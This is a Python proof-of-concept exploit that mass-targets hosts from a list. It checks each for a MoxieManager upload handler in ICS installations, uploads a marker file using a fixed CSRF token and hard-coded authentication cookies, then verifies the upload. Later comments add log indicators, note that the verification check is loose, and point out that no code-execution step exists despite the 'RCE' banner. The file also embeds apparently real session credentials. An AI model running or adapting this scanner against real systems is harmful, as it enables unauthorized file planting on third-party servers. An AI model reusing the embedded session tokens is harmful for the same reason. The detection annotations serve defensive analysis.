POC / exploit.py PY
#!/usr/bin/env python3
import requests
import time
import sys
import re
import json
from urllib.parse import urljoin, urlparse

# Fixed values the script writes to, or requests from, every target. Because
# they never vary between runs, each one is a stable indicator to search for
# in web access logs and in the MoxieManager file store.

# Name of the file the upload request asks the server to store.
TARGET_FILE = "vandinha.txt"
# Marker text written into that file; smart_verify looks for it in the
# download response.
PROBE_CONTENT = "prova do conceito por VandaTheGod salve rapaziada do discord oivin bom uai "
# Path component used when building the download URL
# (/moxiemanager/files/users/<USER_UUID>/...). Presumably the identifier of
# the account whose cookies are hard-coded in main(); confirm against the
# application's user store.
USER_UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

def normalize_target(target):
    """Return *target* as a URL with a scheme and no trailing slash.

    Entries that do not already start with ``http://`` or ``https://`` are
    assumed to be HTTPS hosts. All trailing ``/`` characters are stripped.
    """
    has_scheme = target.startswith('http://') or target.startswith('https://')
    url = target if has_scheme else 'https://' + target
    return url.rstrip('/')

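def get_moxie_endpoint(base_url):
    """Check whether the MoxieManager API handler answers under *base_url*.

    Sends a single GET to the handler with ``action=language&code=en`` and
    treats an HTTP 200 as "handler present".

    Detection notes: this request is made with the module-level
    ``requests.get`` rather than the session that ``main`` configures, so it
    carries neither the hard-coded cookies nor the browser-like headers. In
    access logs it appears as an unauthenticated GET for
    ``.../moxiemanager/api.ashx?action=language&code=en``, sent with whatever
    default headers the requests library uses.

    Args:
        base_url: Target base URL as produced by ``normalize_target``.

    Returns:
        The handler URL when the probe returns 200, otherwise ``None``
        (including when the request itself fails).
    """
    moxie_path = urljoin(base_url, "ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx")
    try:
        r = requests.get(moxie_path + "?action=language&code=en", timeout=10)
    except Exception:
        # Best-effort probe: any request failure counts as "not found".
        # Catching Exception instead of a bare except lets KeyboardInterrupt
        # and SystemExit propagate rather than being silently swallowed.
        return None
    return moxie_path if r.status_code == 200 else None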

def get_correct_download_url(base_domain):
    """Build the getfile.aspx URL under which the probe file is expected.

    The original author's docstring asserted that this path works on every
    ICS installation; nothing in this file checks that claim.

    The scheme is always ``https`` here, even when the target entry was given
    as ``http://``. The path embeds the module constants ``USER_UUID`` and
    ``TARGET_FILE``, so requests to
    ``/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/...``
    ending in that file name are a direct log indicator of this script.
    """
    stored_path = f"/moxiemanager/files/users/{USER_UUID}/{TARGET_FILE}"
    return f"https://{base_domain}/ICS/staticpages/getfile.aspx?target={stored_path}"

def smart_verify(session, base_domain, cookies):
    """Fetch the expected download URL and decide whether the probe file is there.

    Args:
        session: Object exposing a requests-style ``get`` method.
        base_domain: Host (and optional port) passed to
            ``get_correct_download_url``.
        cookies: Cookie mapping sent with the request.

    Returns:
        ``(True, url)`` when the response is accepted as confirmation,
        otherwise ``(False, None)``. Request errors are printed and also
        yield ``(False, None)``.

    NOTE(review): the acceptance test is loose. ``size_ok`` on its own is
    sufficient, so any HTTP 200 body of 11 to 4999 characters (a login or
    error page, for instance) is reported as confirmed even when it does not
    contain the probe text. A "VULN CONFIRMADA" line from this tool is
    therefore not evidence by itself; confirm against server-side upload logs
    or the file store.
    """
    main_url = get_correct_download_url(base_domain)
    
    try:
        print(f"    → Verificando: {main_url}")
        r = session.get(main_url, cookies=cookies, timeout=8)
        print(f"    Verify: {r.status_code} | {len(r.text)} bytes")
        
        if r.status_code == 200:
            # Content match: exact marker, case-insensitive marker, or just
            # the file name appearing anywhere in the body.
            content_ok = (PROBE_CONTENT in r.text or 
                         PROBE_CONTENT.lower() in r.text.lower() or 
                         TARGET_FILE in r.text)
            # Size heuristic only; it does not look at the body's content.
            size_ok = len(r.text) < 5000 and len(r.text) > 10
            if content_ok or size_ok:
                print(f"    ✅ VULN CONFIRMADA! ({len(r.text)} bytes)")
                return True, main_url
            else:
                print(f"    ℹ️  Resposta: {r.text[:100]}...")
        return False, None
    except Exception as e:
        print(f"    Verify error: {e}")
        return False, None

def exploit_moxie(session, moxie_url, cookies, base_domain):
    """Send the probe file to the handler's upload action, then verify it.

    Args:
        session: Object exposing requests-style ``post``/``get`` methods.
        moxie_url: Handler URL returned by ``get_moxie_endpoint``.
        cookies: Cookie mapping sent with the upload and the verification.
        base_domain: Host (and optional port) used to build the download URL.

    Returns:
        ``(True, url)`` or ``(False, None)``, either from the "already
        exists" shortcut below or from ``smart_verify``.

    Detection notes: the upload parameters are passed via ``params=``, so
    they travel in the query string and are visible in web access logs:
    ``action=upload``, the fixed ``path=/1085255``, ``name=<TARGET_FILE>``
    and a constant ``csrf`` value. That csrf value is a literal in this file
    and is not fetched from the target; if a server accepts the upload with
    it, the token is presumably not bound to the session (confirm on the
    application side).

    NOTE(review): an error message containing "exists" is returned as success
    without fetching the file, so that result only shows the handler
    processed the request far enough to report a name collision.
    """
    print(f"    📁 Moxie encontrado")
    
    # Multipart body: a small text/plain file holding the marker string.
    files = {'file': (TARGET_FILE, PROBE_CONTENT, 'text/plain')}
    params = {
        'action': 'upload', 
        'path': '/1085255', 
        'name': TARGET_FILE,
        'loaded': '0', 
        'total': str(len(PROBE_CONTENT)), 
        'id': 'null',
        'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164',
        'resolution': 'default'
    }
    
    try:
        r = session.post(moxie_url, params=params, files=files, cookies=cookies, timeout=15)
        print(f"    ⬆️  Upload: {r.status_code}")
        
        try:
            data = json.loads(r.text)
            if 'error' in data:
                msg = data['error']['message']
                if "exists" in msg.lower():
                    print("    ✅ ARQUIVO JÁ EXISTE = VULNERÁVEL!")
                    return True, get_correct_download_url(base_domain)
                print(f"    ⚠️  Error: {msg}")
            else:
                print("    ✅ Upload aceito")
        except:
            # Bare except: besides invalid JSON, this also swallows
            # KeyError/TypeError from an unexpected response shape, and the
            # code falls through to verification regardless.
            print(f"    📄 Raw: {r.text[:100]}")
        
        # Fixed pause before the verification request.
        time.sleep(2)
        return smart_verify(session, base_domain, cookies)
        
    except Exception as e:
        print(f"    ❌ Error: {e}")
        return False, None

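def main(targets_file):
    """Run the probe / upload / verify sequence for every host in *targets_file*.

    Reads one target per line (blank lines skipped), normalises each with
    ``normalize_target``, probes for the MoxieManager handler and, where it
    answers, calls ``exploit_moxie``. Per-target status and a final summary
    are printed. Exits with status 1 when the target file cannot be read.

    The banner string says "RCE", but the code in this file only uploads a
    ``text/plain`` file and requests it back; no code execution step is
    present here.

    Args:
        targets_file: Path of the text file listing targets.
    """
    # Cookies updated with the supplied values (translated original comment).
    # NOTE(review): these are session credentials committed in source:
    # '.ASPXAUTH' is the ASP.NET forms-authentication ticket cookie, alongside
    # a session id and a session-fixation token. The same values are sent to
    # every host in the list, so they appear in the request logs of each
    # scanned server and identify traffic from this script. Whoever owns the
    # originating account should treat the session as exposed.
    COOKIES = {
        '.ASPXAUTH': '169B17918AB2A77E863048D815ED34505A3FA476FE38ABAF375D76BACD466018C22ADDEB40F9A68DC042113CD797C40B331F5CFD8A2CCCC35285773E600FB30CFABD7E76F19DE2CDC815A67E34F33F48D2D1C85CD08D7257F5EE356D275D122D',
        '.sessionheartbeat': '3/30/2026 8:23:15 PM',
        'ASP.NET_SessionId': 'jrms0jrdjrs2mfaqlsucgrib',
        'SessionFixation.SecurityToken': 'vjmiZ7ksFjkYVZFZMW9LXztMXcpiQ2ZKyLznZaVSBKyXVhGj1X'
    }

    print("🚀 Vanda-AutoExploit v3.0 - ICS MoxieManager RCE")
    print(f"📄 {TARGET_FILE} → '{PROBE_CONTENT}' | UUID: {USER_UUID}")

    try:
        with open(targets_file, 'r') as f:
            targets = [normalize_target(line.strip()) for line in f if line.strip()]
    except (OSError, UnicodeError):
        # Only file-access and decoding failures are expected here; a bare
        # except would also hide KeyboardInterrupt and programming errors.
        # The message ("create sites.txt") names the default file even when
        # another path was supplied.
        print("❌ Crie sites.txt")
        sys.exit(1)

    results = []
    for i, target in enumerate(targets, 1):
        print(f"\n[{i}/{len(targets)}] {target}")

        # Fresh session per target with browser-like headers; Referer and
        # Origin are set to the target itself.
        session = requests.Session()
        session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Referer': f'{target}/ICS/',
            'Origin': target,
            'Accept': '*/*'
        })

        moxie_url = get_moxie_endpoint(target)
        base_domain = urlparse(target).netloc

        if moxie_url:
            success, vuln_url = exploit_moxie(session, moxie_url, COOKIES, base_domain)
            if success:
                print(f"  🎯 VULN! {vuln_url}")
                results.append((target, vuln_url))
            else:
                print("  ❌ Fail")
        else:
            print("  ⏭️  No Moxie")

    print(f"\n{'='*80}")
    print(f"🎯 RESULTADO FINAL: {len(results)}/{len(targets)} VULNERÁVEIS")
    print("\n🔗 LINKS FUNCIONAIS:")
    for target, url in results:
        print(f"  {target:<35} → {url}")

    # The original summary named 'vanda.txt', which is not the file the
    # script uploads; report the actual TARGET_FILE so the output matches
    # what would be found on a server.
    print(f"\n💾 {len(results)} arquivos '{TARGET_FILE}' implantados!")
    print("👉 Teste manual: curl -b cookies.txt URL")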

if __name__ == "__main__":
    # First CLI argument is the target list; defaults to sites.txt.
    targets_path = sys.argv[1] if len(sys.argv) > 1 else 'sites.txt'
    main(targets_path)